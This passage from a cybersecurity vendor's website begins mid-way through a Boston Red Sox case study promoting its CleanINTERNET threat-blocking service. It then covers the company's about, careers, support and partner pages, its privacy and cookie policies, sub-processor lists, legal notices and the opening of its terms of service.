first sat down and had a chance to do a proof of concept, I was shocked at two things in particular. One, the amount of exploits that could be identified in advance. And two, the fact that there was no noticeable impact on our network.”For the first time, the Red Sox had a security tool that didn’t just identify threats—it blocked them before they could ever pose a risk. CleanINTERNET® leveraged real-time intelligence to proactively shield the network, keeping malicious activity from infiltrating their critical systems.The impact was immediate:Over 5 million security events were shielded per day, preventing attacks before they reached the network.More than 150 million threats were blocked each month, dramatically reducing risk exposure.A 99.94% shielding effectiveness, eliminating nearly all high-risk traffic.A 97% decrease in reconnaissance activity, cutting scanning attempts from 1.4 million to just over 36,000.By proactively filtering out threats before they could ever reach the Red Sox network, CleanINTERNET® didn’t just improve security—it transformed operations. It reduced the burden on security operations, increasing their bandwidth so they could focus on more strategic initiatives. And by eliminating unnecessary malicious traffic, the network ran more efficiently.“Just looking at our reports from the last month, we’re shielding about five plus million events a day from our network, that’s over 150 million a month, which is pretty remarkable.”Ryan Oreste, Director of IT Operations, Boston Red SoxBoston Red SoxCleanINTERNET® wasn’t just another security tool. It was a fundamental shift in how the Red Sox approached cybersecurity. No longer just a necessary cost of doing business, security became an advantage and a proactive force ensuring that the team could focus on what mattered most—both on and off the field.Building Cyber Resilience: The Red Sox PlaybookCybersecurity can no longer be just about responding to threats — today it’s also about breaking free from a reactive cycle and taking control with proactive, intelligence-driven defenses. Every organization faces cyber risk, but no two businesses face it the same way. A major sports venue has different vulnerabilities than a financial institution or a hospital—but attackers don’t care. They exploit weaknesses wherever they find them.“What CleanINTERNET has done for us is just wrap the digital bubble around our entire perimeter environment,” says George. “It’s just a vast ecosystem of threat intel sources that we now have access to.”For years, security teams have been forced into a reactive posture, scrambling to mitigate threats after the fact. But with CleanINTERNET®, that paradigm has shifted.Threats are stopped before they ever reach the network.Security teams no longer drown in alerts—intelligence filters out the noise so they can focus on real risks.Cyber operations are more efficient, allowing the team to take on high-priority initiatives instead of getting stuck in endless incident response.Instead of waiting for attacks to unfold inside their network, threats are being neutralized at the perimeter—before they can become a problem.“Partners like Centripetal are incredibly valuable to us,” Shield said. “We’re reaching a point where just trying to do those things in a reactive manner is no longer good enough.” With intelligence powered cybersecurity in place, the Red Sox have transformed their defense from reactive to resilient.“It’s one of the few proactive efforts that we have in the space that is always evolving,” Shield says. “It puts a huge dent in our threat landscape. And I don’t see us ever going back.” Learn more about CleanINTERNET®. --- ### [Threat Research](https://www.centripetal.ai/threat-research) Published: 2025-07-16 Sign up for our free threat alert bulletin service here. Sign up for a custom demonstration from our security team of how we bring together the best minds and most complete collection of threat intelligence to provide you with a shocking level of relief.  --- ### [About](https://www.centripetal.ai/company/about) Published: 2025-07-22 Centripetal delivers what security leaders need most: threats stopped before they ever reach the network. By combining the global threat intelligence with expert human analysis at speed and scale, Centripetal solutions automatically stop malicious activity in real time, all the time.  Leading In The BreachThe vast majority of threats have some kind of intelligence ahead of them. So, why can’t they be stopped? The challenge isn’t a lack of data. It’s operationalizing that intelligence—from thousands of sources, for billions of indicators—to detect known and unknown threats. So, that’s what we do. We look at the very edge of the network—scanning individual packets as they arrive at the enterprise itself. If there’s a correlation for a threat, we find it. And we stop it. [shortCodes] A Clean Internet For AllWe founded Centripetal in 2009 to protect organizations and secure the way forward—for business, for economies, and for the promise and potential of a connected world. Our work on the biggest, hardest problems in cybersecurity have earned recognition and trust from the CIA, NSA, DHS, and DOD, among others.Today, more than 120 people on three continents show up every day to protect every business from every known and unknown threat. See how CleanINTERNET®—the 24/7 proactive threat prevention solution—can protect your business, your customers, and your reputation. --- ### [Careers](https://www.centripetal.ai/company/careers) Published: 2025-07-23 We’re looking for team members with a passion for solving big cybersecurity problems with a mix of intelligence, curiosity, and passion. If this describes you, and we sound like the kind of company you’re looking to be part of, Centripetal is the place for you.Check out the current opportunities. If you don’t see a position that fits your exact skills or background, but feel you’ve got what it takes to contribute in a meaningful way, please reach out to us at careers@centripetal.aiCentripetal is an equal-opportunity employer. Sign up for expert threat intel and see how Centripetal is redefining cyber defense—before the threat hits your firewall. Sign up for a custom demonstration from our security team of how we bring together the best minds and most complete collection of threat intelligence to provide you with a shocking level of relief.  --- ### [Press](https://www.centripetal.ai/company/press) Published: 2025-07-23 For press enquiries in the UK & Ireland please contact: Gina Blackiegina@nurturepublicrelations.com+44 777 5521487 Sign up for expert threat intel and see how Centripetal is redefining cyber defense—before the threat hits your firewall. Sign up for a custom demonstration from our security team of how we bring together the best minds and most complete collection of threat intelligence to provide you with a shocking level of relief.  --- ### [Get a Demo](https://www.centripetal.ai/get-a-demo) Published: 2025-07-16 See what it means to stop threats before they ever reach your network. Most defenses react after the fact. Centripetal is different.Our impact is measured by what doesn’t happen: no endless alerts, no costly breaches, no chaos for your team.Every day, billion of malicious threats move across the internet. Most pass by - but some are aimed directly at you. That’s where speed, scale, and skill converge: each packet analyzed, decisions made in an instant, and the threat blocked before it ever touches your network.This isn’t theory. It’s real-time protection for real-time threats - always watching, always working.Press play and see how prevention really works. The Details Behind The Defense.Explore Below. --- ### [Support](https://www.centripetal.ai/support) Published: 2025-07-16 [shortCodes]We are here to help you get the most value from your Centripetal solution.If you need assistance of any kind, simply reach out to our support team. An experienced technical support engineer or security analyst will be happy to help solve any issue, or answer any question that you may have. We pride ourselves on being proactive, prompt, and highly resourceful.Reach out to connect with a member of our team—no bots, no noise, just clear answers and next steps. --- ### [Partners](https://www.centripetal.ai/partners) Published: 2025-07-16 Intelligence, Expertise & Exponential GrowthCentripetal’s partner network is a select community of industry leaders who are joining forces and  forging a new intelligence-powered standard to protect networks from cyber threats. Our partners are essential to shaping the future of cybersecurity. Start the conversation and see what we can achieve together. --- ### [Privacy Policy](https://www.centripetal.ai/privacy-policy) Published: 2025-07-21 Privacy PolicyEffective Date: May 1, 2026 1. IntroductionCentripetal Networks, LLC (“Centripetal,” “we,” “us,” or “our”) provides the CleanINTERNET® suite of cybersecurity services. This Privacy Policy describes how we collect, use, and share personal information about visitors to centripetal.ai and about the individuals (almost always acting in their professional capacity) who interact with us as representatives of our customers, prospective customers, partners, and vendors.Customer data we process through CleanINTERNET on our customers’ behalf is governed by the applicable data processing agreement, not by this policy.Our mailing address is: Centripetal NetworksC/O Legal145 Maplewood Avenue4th FloorPortsmouth, NH 03801. Contact us at privacy@centripetal.ai2. Information we collectBusiness contact and professional information. Names, business email addresses, phone numbers, job titles, and company names. We collect this directly when you interact with us, and we also obtain business contact information from third-party data enrichment providers, professional networking platforms, and publicly available sources.Website and technical data. When you visit centripetal.ai, we automatically collect IP address, browser type, device and operating system characteristics, pages visited, and referring URLs, including through cookies and similar technologies. For details, see our Cookie Notice.Communications data. The content of communications when you contact us, request support, respond to surveys, or provide feedback, along with associated contact details.Event and marketing data. Registration information, attendance records, and marketing preferences in connection with our events, webinars, conferences, and marketing programs.3. How we use informationWe use the information we collect to:Provide, administer, and support our services and website, and manage relationships with customers, partners, and vendors;Send newsletters, event invitations, and other marketing communications, subject to your right to opt out at any time through the unsubscribe link in any marketing email or by contacting us at privacy@centripetal.ai (opting out will not affect service or transactional communications);Analyze use of our services and website to improve them, conduct research, and create aggregated or de-identified data;Comply with applicable laws, respond to legal process, and establish, exercise, or defend legal claims; andProtect our systems, services, and users against unauthorized access, fraud, and other threats.We do not sell personal information or use it for third-party advertising.4. Legal bases for processingWhere required by applicable data protection law, we rely on the following legal bases:PurposeLegal basisService delivery and business operationsPerformance of a contract, or our legitimate interest in managing business relationshipsMarketing and communicationsYour consent where required by law; otherwise our legitimate interest in promoting our services to professional contactsAnalytics and improvementOur legitimate interest in understanding and improving our services and websiteLegal and complianceCompliance with a legal obligation, or our legitimate interest in establishing, exercising, or defending legal claimsSecurity and fraud preventionOur legitimate interest in protecting our systems, services, and usersWhere we rely on legitimate interest, we have assessed that our interests do not override the rights of the individuals concerned, taking into account that the personal information relates to individuals in their professional capacity.5. SharingWe share personal information with:Affiliates, in connection with our business operations and service delivery;Service providers that process information on our behalf (for example, CRM, hosting, analytics, marketing, support, payment processing, and crash diagnostics). We contractually require these providers to protect the information they receive at a level equivalent to that described in this policy and to use it only to perform services for us;Professional advisors such as lawyers, auditors, and insurers;Legal and regulatory recipients, where disclosure is required by law or legal process or necessary to protect rights, property, or safety; andCounterparties to any actual or proposed merger, acquisition, reorganization, or sale of assets.A list of sub-processors used to deliver our CleanINTERNET services is available.6. International transfersPersonal information we collect may be transferred to and processed in the United States and other countries, which may have data protection laws that differ from those in your jurisdiction. Where we transfer personal information from the EEA, the UK, or Switzerland to a country not recognized as providing an adequate level of protection, we rely on Standard Contractual Clauses (with the UK Addendum where applicable) as our transfer mechanism. Copies are available on request at legal@centripetal.ai.7. SecurityWe maintain administrative, technical, and organizational safeguards designed to protect personal information, taking into account the nature of the information and the risks of processing. No security system is entirely infallible, and we cannot guarantee absolute security.In the event of a confirmed data breach that compromises personal information we hold about you, we will notify affected individuals without undue delay and in accordance with applicable law.8. RetentionWe retain personal information for as long as necessary to fulfill the purposes described in this policy and to comply with our legal, regulatory, accounting, and reporting obligations. We may retain information longer to resolve disputes, enforce our agreements, or where deletion from backups is not reasonably feasible, in which case we isolate it from active processing.9. Your rightsDepending on your jurisdiction, you may have the right to access, correct, delete, or port your personal information; to restrict or object to certain processing; and to withdraw consent where processing is based on consent. You will not be subject to discriminatory treatment for exercising these rights.To submit a request, contact us at legal@centripetal.ai. We will verify your identity before responding and may decline requests where permitted by law (for example, where the request is manifestly unfounded or excessive, or where fulfilling it would compromise the privacy of others). If your information is processed through our CleanINTERNET services on behalf of your organization, please direct your request to that organization; we will assist the customer in responding as required by our agreement.If you believe our processing violates applicable data protection law, you have the right to lodge a complaint with a supervisory authority in your jurisdiction.11. CleanINTERNET® Access applicationThis section applies to the CleanINTERNET Access application available for devices including those operating on iOS, macOS, Windows, and Android, and supplements the rest of this policy. Where it conflicts with another section, this section controls for data collected through the application.What the app collects. When you sign in, we collect account and authentication data, including business email address and authentication tokens (and, where your organization uses federated single sign-on, identifiers passed through that flow). To deliver the service, the app processes network data on your device — including DNS queries and connection metadata — for the sole purpose of filtering and protecting traffic according to your organization’s security policies. The app also collects limited technical and operational data such as device type, operating system version, application version, and crash diagnostics.How we use this data. We use the data collected by the app solely to provide and operate the CleanINTERNET service: authenticating users, filtering and protecting network traffic, maintaining and improving service reliability, and diagnosing crashes. We do not use any data collected by the app for advertising, marketing, profiling, or any other purpose unrelated to providing the service. We do not sell or rent data collected by the app, and we do not disclose it to third parties except (a) to the service providers identified in Section 5 acting on our behalf and (b) as required by law.Network Extension Framework. On Apple platforms, the app uses the Network Extension Framework solely to filter and protect your network traffic in accordance with your organization’s configured policies. We do not divert your network data through undisclosed processes and do not use it to identify your location or to bypass settings you have configured on your device.Third-party SDKs. The app uses Google Firebase Crashlytics to collect crash diagnostics. Crashlytics processes this data on our behalf under terms that require equivalent protection of that data and prohibit use for any other purpose.Consent, account deletion, and your controls. You may stop the app’s data collection at any time by signing out of and uninstalling the app. If you signed in with an individual account, you can request deletion of that account from within the app or by contacting privacy@centripetal.ai If your account was provisioned by your organization, account deletion is administered by your organization.Children. The CleanINTERNET Access application is not directed to children under 13 and we do not knowingly collect personal information from children.12. Changes to this policyWe may update this policy from time to time. When we make material changes, we will update the Effective Date and post the revised version on our website. --- ### [Cookie Policy](https://www.centripetal.ai/cookie-policy) Published: 2025-07-21 Cookie PolicyLast Updated: August 31, 2026 1. IntroductionThis Cookie Policy explains how Centripetal Networks, Inc. ("Centripetal," "we," "us," or "our") uses cookies and similar tracking technologies when you visit www.centripetal.ai (the "Site"). It explains what these technologies are, why we use them, the types of cookies we use (including the personal information we may collect through them), and how you can control your preferences.This Cookie Policy should be read together with our Privacy Policy, which describes how we collect, use, and disclose personal information more generally.2. What Are Cookies and Similar Technologies?Cookies are small text files that are placed on your device (computer, smartphone, tablet, or other internet-enabled device) when you visit a website. Cookies are widely used by website owners to make their websites work, to operate more efficiently, and to provide reporting and other information.Cookies set by the website operator are called "first-party cookies." Cookies set by parties other than the website operator are called "third-party cookies." Third-party cookies enable third-party features or functionality on or through the website (such as analytics, advertising, embedded content, and interactive features). The parties that set these third-party cookies can recognize your device both when it visits the website in question and when it visits certain other websites.In addition to cookies, we and our service providers may use related technologies such as web beacons (also called "pixel tags" or "clear GIFs"), software development kits (SDKs), local storage, and similar tracking technologies. For convenience, this policy uses the term "cookies" to refer collectively to these technologies.3. Why We Use CookiesWe use cookies for several reasons. Some cookies are required for technical reasons in order for our Site to operate, and we refer to these as "strictly necessary" or "essential" cookies. Other cookies enable us to track and target the interests of our users to enhance the experience on our Site. Third parties serve cookies through our Site for analytics, advertising, and other purposes. The specific types of cookies served through our Site and the purposes they perform are described below.4. Cookies We Use4.1 Necessary CookiesThese cookies are necessary for the Site to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in, or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the Site will no longer work.Cookie NameProviderPurposeTypeCookieConsentCentripetal / CMPStores the user's cookie consent state for the current domain.1st partylocale_prefCentripetalStores the user's language preference for the site.1st party__cf_bmCloudflareBot management cookie used to distinguish humans from bots; supports security and site performance. Set across hubspot.com, hs-scripts.com, hs-banner.com, hs-analytics.net, hsforms.com, hsadspixel.net, usemessages.com, fonts.net.3rd party_cfuvidCloudflareUsed by Cloudflare to identify a trusted client session and bypass rate limits.3rd party4.2 Preferences CookiesThese cookies enable the Site to provide enhanced functionality and personalization. They may be set by us or by third-party providers whose services we have added to our pages. If you do not allow these cookies, some or all of these services may not function properly.Cookie NameProviderPurposeType_zitokZoomInfoVisitor identification cookie used by ZoomInfo's website-visitor identification service.1st party4.3 Statistics CookiesThese cookies allow us to count visits and traffic sources so we can measure and improve the performance of our Site. They help us to know which pages are the most and least popular and see how visitors move around the Site. All information these cookies collect is aggregated and, in some cases, used to identify individual visitors for purposes of measuring user behavior.Cookie NameProviderPurposeType_gaGoogle AnalyticsDistinguishes unique users by assigning a randomly generated client identifier.1st party_ga_KEJRV5LG1CGoogle Analytics 4Used by Google Analytics 4 to persist session state for this specific property.1st party_gidGoogle AnalyticsDistinguishes users for a 24-hour period; used to generate statistical data on site usage.1st party__hstcHubSpotMain HubSpot analytics cookie; tracks visitors across sessions.1st party__hsscHubSpotHubSpot session cookie; determines when to update the analytics session counter.1st party__hssrcHubSpotIndicates whether the visitor has restarted their browser; used by HubSpot session tracking.1st partyhubspotutkHubSpotIdentifies a visitor uniquely; passed to HubSpot on form submission and used for contact de-duplication.1st party_hjSession_2965465HotjarHolds the current Hotjar session data.1st party_hjSessionUser_2965465HotjarPersists a unique Hotjar user ID across sessions.1st party4.4 Marketing CookiesThese cookies may be set through our Site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant advertisements on other sites. They do not directly store personal information but are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising.Cookie NameProviderPurposeTypeTDIDThe Trade Desk (adsrvr.org)Programmatic advertising identifier used for cross-site retargeting and ad measurement.3rd party_gcl_auGoogle AdsUsed by the Google Ads conversion linker to store and track ad conversions.1st partytest_cookieGoogle (DoubleClick)Checks whether the user's browser supports cookies. Set by doubleclick.net.3rd partybcookieLinkedInLinkedIn browser identifier used by the LinkedIn Insight Tag to enable advertising and analytics features.3rd partylidcLinkedInLinkedIn cookie used to facilitate data center selection.3rd partyli_sugrLinkedInLinkedIn probabilistic browser identifier used for ad targeting and analytics.3rd partycbClickagy / IntentsifyAudience and intent-data cookie used for behavioral advertising and audience segmentation.3rd partychsClickagy / Intentsify (aorta.clickagy.com)Channel-sync cookie used by Clickagy/Intentsify for audience segmentation and behavioral advertising.3rd party5. How You Can Control CookiesYou have the right to decide whether to accept or reject cookies. You can exercise your cookie rights as described below.5.1 Cookie PreferencesYou can set or amend your preferences for cookies on our Site at any time by clicking “Customize” then "Deny" in our cookie consent banner here, to open our cookie preference center. You can use the preference center to opt in or out of categories of cookies (other than strictly necessary cookies, which are required for the Site to function).5.2 Browser ControlsMost web browsers allow some control of most cookies through the browser settings. To find out more about cookies, including how to see what cookies have been set and how to manage and delete them, visit www.allaboutcookies.org or aboutcookies.org. To opt out of being tracked by Google Analytics across all websites, visit https://tools.google.com/dlpage/gaoptout.6. Supplemental Information for EU, UK, and EEA VisitorsIf you are located in the European Economic Area (EEA), the United Kingdom, or Switzerland, the following supplemental information applies.6.1 Legal BasisWe rely on the following legal bases under the EU General Data Protection Regulation (GDPR) and the UK GDPR for our use of cookies:Strictly necessary cookies: our legitimate interests in operating a secure and functional website (Article 6(1)(f) GDPR), and where applicable, the ePrivacy exemption for cookies strictly necessary for the provision of a service explicitly requested by the user.All other cookies (functional, analytics, and advertising): your consent (Article 6(1)(a) GDPR), which you may give or withhold via our cookie banner and may withdraw at any time through the cookie preference center.6.2 Withdrawing ConsentYou may withdraw your consent at any time by accessing the cookie preference center via the link in the Site footer. Withdrawing consent will not affect the lawfulness of processing carried out before withdrawal.6.3 International TransfersSeveral of the third-party providers listed in this Cookie Policy (including Google, HubSpot, and LinkedIn) are based in the United States or transfer data outside the EEA/UK. Where such transfers occur, we and our service providers rely on appropriate safeguards, including Standard Contractual Clauses and, where applicable, the EU-US Data Privacy Framework.7. Supplemental Information for US State ResidentsIf you are a resident of California, Colorado, Connecticut, Virginia, Texas, or another US state with a comprehensive consumer privacy law, the following supplemental information applies.7.1 Sale and Sharing of Personal InformationSome of the cookies described in Section 4.4 (Advertising and Targeting Cookies) involve the disclosure of personal information (such as online identifiers, IP address, and browsing activity) to third-party advertising partners in ways that may be considered a "sale" or "sharing for cross-context behavioral advertising" under the California Privacy Rights Act and similar state laws.7.2 Your Right to Opt OutYou have the right to opt out of the sale or sharing of your personal information at any time. To exercise this right, you can:Click “Customize” then "Deny" in our cookie consent banner, here.Configure your browser to send a Global Privacy Control (GPC) signal, which we will honor as a valid opt-out request for that browser.Submit a request through the contact methods described in Section 9.7.3 Sensitive Personal InformationWe do not knowingly use cookies or similar technologies to collect sensitive personal information (as defined under CCPA/CPRA) for the purpose of inferring characteristics about you.8. "Do Not Track" SignalsSome browsers offer a "Do Not Track" (DNT) signal. Because there is no industry consensus on how to interpret DNT signals, we do not currently respond to DNT signals. We do, however, honor the Global Privacy Control (GPC) signal as described in Section 5.3.9. How to Contact UsIf you have questions about our use of cookies or this Cookie Policy, please contact us:privacy@centripetal.aiLegal Dept145 Maplewood Avenue4th FloorPortsmouth, NH 0380110. Changes to This Cookie PolicyWe may update this Cookie Policy from time to time to reflect changes to the cookies we use or for other operational, legal, or regulatory reasons. The "Last Updated" date at the top of this policy indicates when it was most recently revised. We encourage you to review this Cookie Policy periodically to stay informed about our use of cookies. --- ### [US Privacy Sub-Processors](https://www.centripetal.ai/us-privacy-sub-processors) Published: 2025-07-21 US Privacy Sub-ProcessorsCentripetal Networks LLC sub-processors. To be notified of changes or updates to this list, please contact Centripetal Networks Customer Support. Sub-Processors for Centripetal Networks ServicesTo be notified of changes or updates to this list, please contact Centripetal Networks Customer Support.Sub-ProcessorData Processing LocationData Processing DurationService ProvidedAmazon Web ServicesUS, EUDuration of ContractData storage, data processing and cloud hosting servicesConfluent, Inc.USDuration of ContractData streaming servicesDatabricksUSDuration of ContractDatabase and data analytics servicesElasticsearch B.V.USDuration of ContractDatabase and data analytics servicesGoogle Cloud PlatformUSDuration of ContractData storage, data processing and cloud hosting servicesMicrosoft AzureUSDuration of ContractData storage, data processing and cloud hosting servicesOkta, Inc. (Auth0)USDuration of ContractAuthentication servicesRedis LtdUSDuration of ContractDatabase servicesSplunk, Inc.USDuration of ContractSecurity logging and data analytics servicesSub-Processors for Centripetal Networks Customer SupportTo be notified of changes or updates to this list, please contact Centripetal Networks Customer Support.Sub-ProcessorData Processing LocationData Processing DurationService ProvidedAkamaiUSDuration of ContractCloud hosting servicesAsana, Inc.USDuration of ContractWork management servicesAtlassianUSDuration of ContractCustomer support platform, content management, ticket management servicesBox, Inc.USDuration of ContractData storage and data sharing servicesCloudflare, Inc.US, EUDuration of ContractContent delivery servicesGoogle WorkspaceUSDuration of ContractProductivity, communication, data storage and data sharing servicesHubSpot, Inc.USDuration of ContractCustomer support platform and servicesLucid Software, Inc.USDuration of ContractProductivity, data storage and data sharing servicesMicrosoft Office 365USDuration of ContractProductivity, communication, data storage and data sharing servicesNotion Labs, Inc.USDuration of ContractCustomer support and work management servicesSlack Technologies LLCUSDuration of ContractProductivity, communication and data sharing servicesUpdated April 12, 2023. --- ### [EU Privacy Sub-Processors](https://www.centripetal.ai/eu-privacy-sub-processors) Published: 2025-07-21 EU Privacy Sub-ProcessorsCentripetal Ltd sub-processors. To be notified of changes or updates to this list, please contact Centripetal Customer Support. Sub-Processors for Centripetal ServicesTo be notified of changes or updates to this list, please contact Centripetal Customer Support.Sub-ProcessorData Processing LocationData Processing DurationService ProvidedAmazon Web ServicesEUDuration of ContractData storage, data processing and cloud hosting servicesCentripetal Networks LLCUSDuration of ContractTechnologies, support and analysis related to all ServicesSub-Processors for Centripetal Customer SupportTo be notified of changes or updates to this list, please contact Centripetal Customer Support.Sub-ProcessorData Processing LocationData Processing DurationService ProvidedAsana, Inc.USDuration of ContractWork management servicesAtlassianUSDuration of ContractCustomer support platform, content management, ticket management servicesCloudflare, Inc.US, EUDuration of ContractContent delivery servicesHubSpot, Inc.USDuration of ContractCustomer support platform and servicesUpdated April 12, 2023. --- ### [Legal Notices](https://www.centripetal.ai/legal-notice) Published: 2025-07-21 Legal NoticesPrivacy PolicySee our Privacy Policy here. Copyright NoticeThis page is intended to serve as notice under 35 U.S.C. §287(a).Copyright © 2026 Centripetal Networks Inc. All Rights Reserved.Ownership of CopyrightThe copyright in this website and the material on this website (including without limitation the text, computer code, artwork, photographs, images, music, audio material, video material and audio-visual) is owned by Centripetal Networks Inc.Centripetal’s products and services practice and are subject to at least the following U.S. patents:8,037,5178,042,1678,495,7259,094,4459,137,2059,203,8069,264,3709,413,7229,560,1769,686,1939,866,5769,917,85610,142,37210,284,52210,333,89810,505,89810,530,90310,541,97210,567,34310,567,43710,659,57310,681,00910,715,49310,735,38010,862,90910,924,45610,931,66110,931,79710,951,66010,944,72110,944,79211,012,41411,012,41511,012,41711,012,45911,012,47411,063,90911,159,54611,233,77711,271,90211,290,42411,349,85411,362,99611,374,90511,418,48711,438,35111,444,96311,463,40511,477,22411,477,23711,496,49711,496,50011,502,99611,516,24111,539,66411,539,66511,552,97011,563,75811,570,13811,574,04711,582,19111,646,99611,683,40111,700,27311,729,14411,736,44011,757,90111,792,22011,797,67111,799,83211,811,80811,811,80911,811,81011,824,87511,824,87911,855,96611,856,00511,902,24011,902,25011,956,33811,997,10912,010,13512,015,59012,015,62612,019,74512,021,83512,028,31112,034,71012,052,29312,107,89312,113,77112,113,77212,166,77412,177,18012,184,66612,218,95912,255,87112,278,82212,335,23512,375,44712,395,48112,452,27012,463,94212,506,71012,513,11512,513,17512,563,10312,580,89312,592,94712,603,86212,647,33612,712,898 Copyright LicenseCentripetal Networks Inc. grants to you a worldwide non-exclusive royalty-free revocable license to: view this website and the material on this website on a computer or mobile device via a web browser; copy and store this website and the material on this website in your web browser cache memory; and print pages from this website for your own [personal and non-commercial] use. Centripetal Networks Inc. does not grant you any other rights in relation to this website or the material on this website. In other words, all other rights are reserved. For the avoidance of doubt, you must not adapt, edit, change, transform, publish, republish, distribute, redistribute, broadcast, rebroadcast or show or play in public this website or the material on this website (in any form or media) without Centripetal Networks Inc. prior written permission.Data MiningThe automated and/or systematic collection of data from this website is prohibited.PermissionsYou may request permission to use the copyright materials on this website by writing to legal@centripetal.aiEnforcement of CopyrightCentripetal Networks Inc. takes the protection of its copyright very seriously. If Centripetal Networks Inc. discovers that you have used its copyright materials in contravention of the license above; Centripetal Networks Inc. may bring legal proceedings against you seeking monetary damages and an injunction to stop you from using those materials. You could also be ordered to pay legal costs. If you become aware of any use of Centripetal Networks Inc. copyright materials that contravenes or may contravene the license above, please report this by email to legal@centripetal.ai.Infringing MaterialIf you become aware of any material on the website that you believe infringes your or any other person’s copyright, please report this by email to legal@centripetal.ai --- ### [Blog](https://www.centripetal.ai/blog) Published: 2025-07-23 Sign up for updates and see how Centripetal is defining cyber defense. Sign up for a custom demonstration from our security team of how we bring together the best minds and most complete collection of threat intelligence to provide you with a shocking level of relief.  --- ### [Terms of Service](https://www.centripetal.ai/terms-of-service) Published: 2025-08-12 Terms of ServiceLast Updated: August 24th 2026This Master Service Agreement (“MSA”), together with any applicable Exhibits, Order Forms, and the Data Processing Agreement, applies to Products and Service provided to Customer by Centripetal Networks, LLC (“Centripetal”). Customer and Centripetal are referred to individually as a “Party” and jointly as “Parties.” 1. STRUCTUREThis MSA sets out the general terms that apply to all Products and Services. Product-specific terms are provided in the applicable Exhibits (e.g., SaaS, Hardware), which are incorporated into this MSA by reference. Each Order Form incorporates this MSA and the relevant Exhibits. The Data Processing Agreement, also incorporated by reference, governs the processing of Personal Information. Collectively, this MSA, the Exhibits, the Order Forms, and the Data Processing Agreement constitute the entire agreement between the Parties (collectively, the “Agreements”). Customer accepts and is bound by the Agreements by signing an Order Form that incorporates them or, if no Order Form is signed by Customer, by accessing or using the Products or Services.2. DEFINITIONSThe following terms shall have the following meanings.a. “Affiliate” means any entity controlled, directly or indirectly, by, under common control with, or controlling, a party, and specifically includes without limitation, subsidiaries, partnerships, joint ventures, and other entities or operations for which the party has operational or management control. For the purposes of this definition, “control” means the power to direct, or cause the direction of, the management and policies of such entity whether by contract, law, or ownership of the majority of the voting shares or assets of another entity.b. “Authorized User” means an employee, agent, contractor, or other third party authorized to access or use the Products.c. “Customer” is the entity/person identified in the applicable Order Form.d. “Customer Data” means all data or information submitted by Customer to the Products or collected by Centripetal in the course of providing Products or Services to Customer, in each case excluding Usage Data, Threat Intelligence Data, Deidentified data, and data licensed to Centripetal by third parties (but not data Customer submits to the Products, or data Centripetal accesses or retrieves from a third party at Customer’s direction or on Customer’s behalf, including logs from Customer’s third-party systems). For clarity, Customer Data includes Personal Information and Customer Confidential Information.e. “CleanINTERNET Remote” means the Centripetal client application for endpoint devices that enables the CI-DNS and CI-Access functions on those devices, including when a device is off the Customer’s protected network. CI-Access provides backhaul of device network traffic.f. “Confidential Information” means all documents, data, information and other materials that a Party receives, acquires or learns or are provided to that Party (“Receiving Party”) by, for, or on behalf of the other Party (“Disclosing Party”) that are not generally known by persons who are not employees, agents, or representatives of Disclosing Party. This term: (i) includes information, documents, data, and other materials (a) related to customers, potential customers, goods and services, Products, Services, operations, manufacturing, production, maintenance, distribution, sales, marketing, customer service, finance, agreements, costs, prices, business plans, purchase orders, invoices, account information, and billing records, (b) marked or designated with a word or symbol indicating that it should be considered confidential, such as “Confidential”, “Personal” or “Privileged”, (c) that Disclosing Party informs Receiving Party are confidential, and (d) that Receiving Party knows or should know are confidential or proprietary information or trade secrets of Disclosing Party or a third-party; but (ii) does not include documents, data, information and other materials that are (a) available from a publicly accessible source, (b) known to Receiving Party at the time of disclosure, (c) obtained by Receiving Party on a non-confidential basis from a third-party without violation of any contractual, statutory, common law, or other duty or obligation, and (d) independently developed by Receiving Party.g. “Deliverables” means the reports, dashboards, alerts, or other tangible outputs expressly provided by Centripetal to Customer, excluding the methodologies, processes, templates, rulesets, analytics models, or other technology used to generate such outputs.h. “Deidentified” means information that does not, and cannot reasonably be used to, identify a particular individual, household, or device of an individual, and “Deidentify” means to process information so that it becomes Deidentified.i. “Documentation” means the user guides, usage guidelines, technical specifications, and similar materials for the Products that Centripetal makes available to Customer, as updated by Centripetal from time to time. Documentation does not include marketing, sales, or promotional materials.j. “DPA” means the Data Processing Agreement which can be found here.k. “Fees” has the meaning assigned to it in the applicable Order Form.l. “Hardware” means any Centripetal hardware device (e.g., RuleGATE) provided to Customer for use with the Products under an applicable Order Form, whether leased or purchased.m. “Liability” means costs, expenses, losses, obligations, damages, actions, suits, demands, settlements, judgments, awards, fines, penalties, fees (including attorney’s fees), and any other form of liability whatsoever.n. “Order Form” means the quotation or other ordering document, however generated, that identifies the Products and Services ordered and their commercial terms (such as products, quantities, Fees, billing contact, and subscription term). An Order Form conveys commercial terms only and does not modify the Agreements except as provided in Section 3 (Scope and Precedence).o. “Personal Information” means information that identifies or is identifiable to a natural person, that Centripetal receives from Customer or Processes for or on behalf of Customer.p. “Products” means, collectively, the following Centripetal offerings purchased or licensed under an applicable Order Form, including without limitation: (i) RuleGATE, (ii) CleanINTERNET DNS (“CI-DNS”), (iii) CleanINTERNET Access (“CI-Access”), (iv) CleanINTERNET Fusion (“CI-Fusion”); and (v) CleanINTERNET Managed Detection and Response (“CI-MDR”). Certain Products may include embedded software or software components delivered with SaaS Products, and may incorporate or be delivered through Third-Party Technology, as further described in the applicable Exhibits. The CI-DNS and CI-Access functions are delivered on endpoint devices through the CleanINTERNET Remote application.q. “SaaS Products” means the cloud-delivered components of the Products made available on a subscription basis, including (i) CI-DNS, (ii) CI-Access, (iii) CI-Fusion; and (iv) CI-MDR, together with any related software components provided by Centripetal for installation on Customer systems or devices.r. “Sub-Processor” means any third-party that Processes Customer Data by, for, or on behalf of Centripetal arising out or related to Centripetal’s performance of its obligations under the MSA.s. “Services” means, collectively, (i) the operation and delivery of the Products on a managed, subscription basis (“Managed Services”), including configuration, ruleset deployment, monitoring, tuning, and reporting; and (ii) any project-based consulting, implementation, configuration, integration, training, or advisory services performed under the applicable Order Form (“Professional Services”).t. “Third-Party Technology” means any technology, software, or content not owned by Centripetal that is incorporated into, provided with, or otherwise made available in connection with the Products or Services, which is licensed subject to the applicable third-party terms.u. “Threat Intelligence Data” means, collectively, Centripetal Threat Intelligence and Derived Threat Intelligence.v. “Centripetal Threat Intelligence” means data regarding malicious or potentially malicious cyber activity or threat actors, including indicators of compromise, domains, IP addresses, URLs, tactics, techniques, 